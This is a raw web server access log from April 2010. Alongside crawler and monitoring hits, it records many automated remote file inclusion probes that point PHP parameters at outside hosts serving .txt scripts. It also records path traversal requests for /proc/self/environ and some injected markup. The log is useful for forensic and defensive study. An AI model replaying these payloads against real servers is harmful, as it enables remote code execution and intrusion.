88.191.94.188 - - [07/Apr/2010:06:18:16 -0400] "GET /logs/access_log.Q109072400///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
66.249.65.179 - - [07/Apr/2010:06:18:30 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L010BDD521EB254000FBC08P+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
88.191.94.188 - - [07/Apr/2010:06:18:42 -0400] "GET /logs/error_log.Q109090800///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [07/Apr/2010:06:19:00 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
88.191.94.188 - - [07/Apr/2010:06:19:05 -0400] "GET /logs/access_log.Q109102900%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:06:19:05 -0400] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:06:19:05 -0400] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:06:19:06 -0400] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:06:19:06 -0400] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:06:19:06 -0400] "GET /logs/access_log.Q109102900%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
95.108.128.242 - - [07/Apr/2010:06:19:52 -0400] "GET /logs/access_log.Q108081300 HTTP/1.1" 404 224 "-" "Yandex/1.01.001 (compatible; Win16; I)"
88.191.94.188 - - [07/Apr/2010:06:19:53 -0400] "GET /logs/access_log.Q110022700%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
217.73.226.51 - - [07/Apr/2010:06:20:02 -0400] "GET /logs/error_log.Q109100100//yabbse/Sources/Packages.php?sourcedir=http://274denimdepartment.com/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.833"
88.191.94.188 - - [07/Apr/2010:06:20:03 -0400] "GET /logs/access_log.Q110022700%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
217.73.226.51 - - [07/Apr/2010:06:20:06 -0400] "GET /logs/error_log.Q109100100//yabbse/Sources/Packages.php?sourcedir=http://274denimdepartment.com/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.833"
217.73.226.51 - - [07/Apr/2010:06:20:09 -0400] "GET /logs/error_log.Q109100100//yabbse/Sources/Packages.php?sourcedir=http://274denimdepartment.com/id.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.833"
121.254.228.146 - - [07/Apr/2010:06:21:13 -0400] "GET /?pid='' HTTP/1.1" 200 409 "-" "libwww-perl/5.79"
85.214.25.33 - - [07/Apr/2010:06:21:29 -0400] "GET /logs/access_log.Q109111500%22onmouseover=%22window.status='www.aceonlinestore.com';returntrue;%22onmouseout=%22window.status='';returntrue;%22class=%22large%22%3Eaccess_log.Q109111500%3C/a%3E%3Cbr/%3E...CLR3.5.30729)"216.160.122.100--[14/Nov/2009:23:59:59-0500]"GET....NETCLR3.0.4506.2152;.NETCLR3.5.30729)"210.222.86.19--[15/Nov/2009:00:...%3Cbr/%3E%3Cspanclass=%22green//admin/common.inc.php?base_path=http://www.paramountbusinesscoach.com/newsite//cmdstate.txt??? HTTP/1.1" 404 650 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
85.214.25.33 - - [07/Apr/2010:06:21:29 -0400] "GET /logs/access_log.Q109111500%22onmouseover=%22window.status='www.aceonlinestore.com';returntrue;%22onmouseout=%22window.status='';returntrue;%22class=%22large%22%3Eaccess_log.Q109111500%3C/a%3E%3Cbr/%3E...CLR3.5.30729)"216.160.122.100--[14/Nov/2009:23:59:59-0500]"GET....NETCLR3.0.4506.2152;.NETCLR3.5.30729)"210.222.86.19--[15/Nov/2009:00:...%3Cbr//admin/common.inc.php?base_path=http://www.paramountbusinesscoach.com/newsite//cmdstate.txt??? HTTP/1.1" 404 620 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
85.214.25.33 - - [07/Apr/2010:06:21:29 -0400] "GET /logs/access_log.Q109111500%22onmouseover=%22window.status='www.aceonlinestore.com';returntrue;%22onmouseout=%22window.status='';returntrue;%22class=%22large%22%3Eaccess_log.Q109111500%3C/a%3E%3Cbr/%3E...CLR3.5.30729)"216.160.122.100--[14/Nov/2009:23:59:59-0500]"GET....NETCLR3.0.4506.2152;.NETCLR3.5.30729)"210.222.86.19--[15/Nov/2009:00:...%3Cbr/%3E%3Cspanclass=%22green//admin/common.inc.php?base_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 650 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
85.214.25.33 - - [07/Apr/2010:06:21:29 -0400] "GET /logs/access_log.Q109111500%22onmouseover=%22window.status='www.aceonlinestore.com';returntrue;%22onmouseout=%22window.status='';returntrue;%22class=%22large%22%3Eaccess_log.Q109111500%3C/a%3E%3Cbr/%3E...CLR3.5.30729)"216.160.122.100--[14/Nov/2009:23:59:59-0500]"GET....NETCLR3.0.4506.2152;.NETCLR3.5.30729)"210.222.86.19--[15/Nov/2009:00:...%3Cbr//admin/common.inc.php?base_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 620 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
85.214.25.33 - - [07/Apr/2010:06:21:29 -0400] "GET /logs/access_log.Q109111500%22onmouseover=%22window.status='www.aceonlinestore.com';returntrue;%22onmouseout=%22window.status='';returntrue;%22class=%22large%22%3Eaccess_log.Q109111500%3C/a%3E%3Cbr/%3E...CLR3.5.30729)"216.160.122.100--[14/Nov/2009:23:59:59-0500]"GET....NETCLR3.0.4506.2152;.NETCLR3.5.30729)"210.222.86.19--[15/Nov/2009:00:...%3Cbr/%3E%3Cspanclass=%22green//admin/common.inc.php?base_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 650 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
85.214.25.33 - - [07/Apr/2010:06:21:29 -0400] "GET /logs/access_log.Q109111500%22onmouseover=%22window.status='www.aceonlinestore.com';returntrue;%22onmouseout=%22window.status='';returntrue;%22class=%22large%22%3Eaccess_log.Q109111500%3C/a%3E%3Cbr/%3E...CLR3.5.30729)"216.160.122.100--[14/Nov/2009:23:59:59-0500]"GET....NETCLR3.0.4506.2152;.NETCLR3.5.30729)"210.222.86.19--[15/Nov/2009:00:...%3Cbr//admin/common.inc.php?base_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 620 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
85.214.25.33 - - [07/Apr/2010:06:21:29 -0400] "GET /logs/access_log.Q109111500%22onmouseover=%22window.status='www.aceonlinestore.com';returntrue;%22onmouseout=%22window.status='';returntrue;%22class=%22large%22%3Eaccess_log.Q109111500%3C/a%3E%3Cbr/%3E...CLR3.5.30729)"216.160.122.100--[14/Nov/2009:23:59:59-0500]"GET....NETCLR3.0.4506.2152;.NETCLR3.5.30729)"210.222.86.19--[15/Nov/2009:00:...%3Cbr/%3E%3Cspanclass=%22green/errors.php?error=http://www.paramountbusinesscoach.com/newsite//cmdstate.txt??? HTTP/1.1" 404 639 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
85.214.25.33 - - [07/Apr/2010:06:21:29 -0400] "GET /logs/access_log.Q109111500%22onmouseover=%22window.status='www.aceonlinestore.com';returntrue;%22onmouseout=%22window.status='';returntrue;%22class=%22large%22%3Eaccess_log.Q109111500%3C/a%3E%3Cbr/%3E...CLR3.5.30729)"216.160.122.100--[14/Nov/2009:23:59:59-0500]"GET....NETCLR3.0.4506.2152;.NETCLR3.5.30729)"210.222.86.19--[15/Nov/2009:00:...%3Cbr/errors.php?error=http://www.paramountbusinesscoach.com/newsite//cmdstate.txt??? HTTP/1.1" 404 609 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
211.39.130.176 - - [07/Apr/2010:06:21:31 -0400] "GET //delete_comment.php?board_skin_path=http://pelet.at.ua/bogel/id1.txt????? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
211.39.130.176 - - [07/Apr/2010:06:21:33 -0400] "GET //delete_comment.php?board_skin_path=http://pelet.at.ua/bogel/id1.txt????? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
211.39.130.176 - - [07/Apr/2010:06:21:33 -0400] "GET /logs//delete_comment.php?board_skin_path=http://pelet.at.ua/bogel/id1.txt????? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
211.39.130.176 - - [07/Apr/2010:06:21:34 -0400] "GET /logs//delete_comment.php?board_skin_path=http://pelet.at.ua/bogel/id1.txt????? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
211.39.130.176 - - [07/Apr/2010:06:21:37 -0400] "GET /logs/access_log.Q110021600//delete_comment.php?board_skin_path=http://pelet.at.ua/bogel/id1.txt????? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
211.39.130.176 - - [07/Apr/2010:06:21:40 -0400] "GET /logs/access_log.Q110021600//delete_comment.php?board_skin_path=http://pelet.at.ua/bogel/id1.txt????? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
211.39.130.176 - - [07/Apr/2010:06:21:46 -0400] "GET /logs/access_log.Q110021500//delete_comment.php?board_skin_path=http://pelet.at.ua/bogel/id1.txt????? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
211.39.130.176 - - [07/Apr/2010:06:21:53 -0400] "GET /logs/access_log.Q110021500//delete_comment.php?board_skin_path=http://pelet.at.ua/bogel/id1.txt????? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:06:22:08 -0400] "GET /logs/access_log.Q110012300%20%20//?_PHPLIB[libdir]=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:06:22:08 -0400] "GET //?_PHPLIB[libdir]=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:06:22:08 -0400] "GET /logs//?_PHPLIB[libdir]=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 200 45241 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:06:22:18 -0400] "GET //?_PHPLIB[libdir]=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:06:22:18 -0400] "GET /logs/access_log.Q110012300%20%20//?_PHPLIB[libdir]=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:06:22:18 -0400] "GET /logs//?_PHPLIB[libdir]=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 200 45241 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:06:22:26 -0400] "GET /logs/access_log.Q109112100%20%20//?_PHPLIB[libdir]=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
95.108.128.242 - - [07/Apr/2010:06:23:54 -0400] "GET /images/_notes/nav04_download_off.jpg.mno HTTP/1.1" 200 259 "-" "Yandex/1.01.001 (compatible; Win16; I)"
213.129.162.152 - - [07/Apr/2010:06:25:29 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
213.129.162.152 - - [07/Apr/2010:06:25:29 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
213.129.162.152 - - [07/Apr/2010:06:25:36 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
213.129.162.152 - - [07/Apr/2010:06:25:36 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
211.239.124.204 - - [07/Apr/2010:06:25:45 -0400] "GET /akocomments.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:06:25:46 -0400] "GET /akocomments.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:06:25:49 -0400] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:06:25:49 -0400] "GET /logs/access_log.Q109091600/akocomments.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:06:25:53 -0400] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
211.239.124.204 - - [07/Apr/2010:06:25:54 -0400] "GET /logs/access_log.Q109091600/akocomments.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:06:26:00 -0400] "GET //bbs//write_comment_update.php?board_skin_path=http://www.iammonline.it/nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:06:26:00 -0400] "GET /logs/access_log.Q110031500%20%20//bbs//write_comment_update.php?board_skin_path=http://www.iammonline.it/nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
200.93.147.154 - - [07/Apr/2010:06:26:00 -0400] "GET /logs//bbs//write_comment_update.php?board_skin_path=http://www.iammonline.it/nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
209.59.12.99 - - [07/Apr/2010:06:27:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.149.241.209 - - [07/Apr/2010:06:27:55 -0400] "GET //localhost/[PATH]/_conf/_php-core/common/-tpl-vars.php?admindir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:06:27:55 -0400] "GET /logs/error_log.Q109090700%20%20//localhost/[PATH]/_conf/_php-core/common/-tpl-vars.php?admindir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:06:27:55 -0400] "GET /logs/access_log.Q109090700%20%20//localhost/[PATH]/_conf/_php-core/common/-tpl-vars.php?admindir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:06:27:55 -0400] "GET //localhost/[PATH]/_conf/_php-core/common/-tpl-vars.php?admindir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:06:27:55 -0400] "GET /logs/access_log.Q109102900//localhost/[PATH]/_conf/_php-core/common/-tpl-vars.php?admindir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:06:27:55 -0400] "GET /logs//localhost/[PATH]/_conf/_php-core/common/-tpl-vars.php?admindir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:06:27:55 -0400] "GET /logs//localhost/[PATH]/_conf/_php-core/common/-tpl-vars.php?admindir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
95.108.128.242 - - [07/Apr/2010:06:27:56 -0400] "GET /images/_notes/nav04_shop_over.jpg.mno HTTP/1.1" 200 258 "-" "Yandex/1.01.001 (compatible; Win16; I)"
89.149.241.209 - - [07/Apr/2010:06:28:11 -0400] "GET /logs//localhost/[PATH]/_conf/_php-core/common/-tpl-vars.php?admindir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:06:28:11 -0400] "GET /logs/access_log.Q109090700//localhost/[PATH]/_conf/_php-core/common/-tpl-vars.php?admindir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:06:28:11 -0400] "GET /logs/error_log.Q109090700//localhost/[PATH]/_conf/_php-core/common/-tpl-vars.php?admindir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:06:28:11 -0400] "GET //localhost/[PATH]/_conf/_php-core/common/-tpl-vars.php?admindir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:06:29:26 -0400] "GET /index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:06:29:26 -0400] "GET /logs/access_log.Q110032100%20%20/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:06:29:26 -0400] "GET /logs/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:06:29:26 -0400] "GET /logs/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:06:29:26 -0400] "GET /logs/access_log.Q110032100%20%20/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:06:29:26 -0400] "GET /index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:06:29:50 -0400] "GET /logs/access_log.Q110031500//?_PHPLIB[libdir]=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
220.181.7.127 - - [07/Apr/2010:06:29:57 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
211.39.130.176 - - [07/Apr/2010:06:30:07 -0400] "GET /logs/access_log.Q110021600%20%20//delete_comment.php?board_skin_path=http://pelet.at.ua/bogel/id1.txt????? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
188.165.195.229 - - [07/Apr/2010:06:30:07 -0400] "GET /logs/access_log.Q110011300//?_PHPLIB[libdir]=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:06:30:12 -0400] "GET /logs/error_log.Q109081100%20%20/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:06:30:14 -0400] "GET /logs/error_log.Q109081100%20%20/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.125.66.72 - - [07/Apr/2010:06:30:20 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
88.191.94.188 - - [07/Apr/2010:06:30:22 -0400] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:06:30:22 -0400] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:06:30:22 -0400] "GET /logs/access_log.Q109070300%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.39.130.176 - - [07/Apr/2010:06:30:29 -0400] "GET /logs/access_log.Q110021600%20%20//delete_comment.php?board_skin_path=http://pelet.at.ua/bogel/id1.txt????? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:06:30:29 -0400] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:06:30:29 -0400] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:06:30:29 -0400] "GET /logs/access_log.Q109070300%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:06:30:36 -0400] "GET /logs/error_log.Q109070300%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.39.130.176 - - [07/Apr/2010:06:30:36 -0400] "GET /logs/access_log.Q110021500%20%20//delete_comment.php?board_skin_path=http://pelet.at.ua/bogel/id1.txt????? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
88.191.94.188 - - [07/Apr/2010:06:30:42 -0400] "GET /logs/error_log.Q109070300%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.39.130.176 - - [07/Apr/2010:06:30:49 -0400] "GET /logs/access_log.Q110021500%20%20//delete_comment.php?board_skin_path=http://pelet.at.ua/bogel/id1.txt????? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:06:31:13 -0400] "GET //localhost/[PATH]/_conf/_php-core/common/-tpl-vars.php?admindir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:06:31:13 -0400] "GET /logs//localhost/[PATH]/_conf/_php-core/common/-tpl-vars.php?admindir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:06:31:13 -0400] "GET /logs/access_log.Q110032500//localhost/[PATH]/_conf/_php-core/common/-tpl-vars.php?admindir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
66.249.65.179 - - [07/Apr/2010:06:31:14 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L010BDD521F12D40000BC08P+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.149.241.209 - - [07/Apr/2010:06:31:18 -0400] "GET /logs/error_log.Q110032500//localhost/[PATH]/_conf/_php-core/common/-tpl-vars.php?admindir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
95.108.128.242 - - [07/Apr/2010:06:31:57 -0400] "GET /images/_notes/home_connect_off.jpg.mno HTTP/1.1" 200 252 "-" "Yandex/1.01.001 (compatible; Win16; I)"
200.93.147.154 - - [07/Apr/2010:06:33:57 -0400] "GET /logs/access_log.Q110031500//bbs//write_comment_update.php?board_skin_path=http://www.iammonline.it/nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:06:33:57 -0400] "GET //localhost/[PATH]/_conf/common/-tpl-vars.php?admindir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:06:33:57 -0400] "GET /logs/access_log.Q109090700%20%20//localhost/[PATH]/_conf/common/-tpl-vars.php?admindir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:06:33:57 -0400] "GET /logs//localhost/[PATH]/_conf/common/-tpl-vars.php?admindir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:06:33:57 -0400] "GET /logs/access_log.Q110032500%20%20//localhost/[PATH]/_conf/common/-tpl-vars.php?admindir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:06:34:24 -0400] "GET /logs/access_log.Q109090700//localhost/[PATH]/_conf/common/-tpl-vars.php?admindir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:06:34:24 -0400] "GET //localhost/[PATH]/_conf/common/-tpl-vars.php?admindir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:06:34:24 -0400] "GET /logs/access_log.Q110032500//localhost/[PATH]/_conf/common/-tpl-vars.php?admindir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
89.149.241.209 - - [07/Apr/2010:06:34:24 -0400] "GET /logs//localhost/[PATH]/_conf/common/-tpl-vars.php?admindir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
